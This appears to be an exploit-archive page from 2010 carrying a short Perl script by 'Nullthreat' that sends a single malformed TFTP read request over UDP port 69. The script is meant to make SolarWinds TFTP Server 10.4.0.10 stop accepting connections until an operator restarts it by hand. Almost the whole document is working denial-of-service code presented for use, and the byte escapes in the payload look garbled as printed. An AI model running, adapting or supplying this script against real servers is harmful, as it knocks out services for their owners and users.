Solarwinds 10.4.0.10 TFTP DOS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Solarwinds 10.4.0.10 TFTP DOS
# Published : 2010-05-21
# Author : Nullthreat
# Previous Title : Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
# Next Title : WinDirectAudio (.WAV) PoC

# Exploit Title: Solarwinds TFTP DOS
# Date: 5-21-2010
# Author: Nullthreat
# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx
# Version: 10.4.0.10
# Tested on: Windows XP SP3
# Code : 

#!/usr/bin/perl
# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit
# by Nullthreat
# The application will not crash, but it will stop accepting connections.
# You will be forced to restart the server by hand in the config
# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k

use IO::Socket;
$port = "69";
$host = $ARGV[0];
$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');

$really=
"x00x01". # Opcode 1 = Read Request
"x01". # The crash....no really thats it
"x00". # Null byte
"NETASCII". # The mode
"x00"; # Null byte
$s->send($really);